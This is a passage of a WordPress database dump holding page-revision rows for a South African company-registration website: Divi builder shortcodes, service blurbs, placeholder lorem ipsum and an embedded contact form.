_address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-22 15:33:29','2019-08-22 13:33:29','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33126,1,'2019-08-22 15:53:15','2019-08-22 13:53:15','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" width=\"87.3%\" custom_margin=\"|auto||181px||\" custom_padding=\"3px|||||\" locked=\"off\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" width=\"100%\" min_height=\"67px\" custom_margin=\"-14px||-12px|||\" custom_padding=\"0px|||||\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"-36px|auto|-33px|auto||\" custom_padding=\"9px|||||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"-17px|||||\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" custom_padding=\"0px|||||\" fb_built=\"1\" _i=\"1\" _address=\"1\" min_height=\"565px\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"600ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:53:15','2019-08-22 13:53:15','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33123,0,'2019-08-22 14:51:37','2019-08-22 14:51:37','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5eadc35cf149.83389218-J5LoCFVqnBepP0eowXeaWzMGM1Akhj7M','','','2019-08-22 16:59:15','2019-08-22 14:59:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33123',0,'scheduled-action','',3),(33124,0,'2019-08-22 14:51:37','2019-08-22 14:51:37','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5eadc3760601.40278827-Tsr4L8aqwRycgC7simALTxBBDHdQFIrJ','','','2019-08-22 16:59:15','2019-08-22 14:59:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33124',0,'scheduled-action','',3),(33125,1,'2019-08-22 15:52:09','2019-08-22 13:52:09','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" width=\"87.3%\" custom_margin=\"|auto||181px||\" locked=\"off\" _i=\"0\" _address=\"0.0\" custom_padding=\"3px|||||\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" width=\"100%\" custom_margin=\"-14px||-12px|||\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\" min_height=\"67px\" custom_padding=\"0px|||||\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"-36px|auto|0px|auto||\" _i=\"1\" _address=\"0.1\" custom_padding=\"9px|||||\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\" custom_margin=\"-17px|||||\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" custom_padding=\"0px|||||\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" 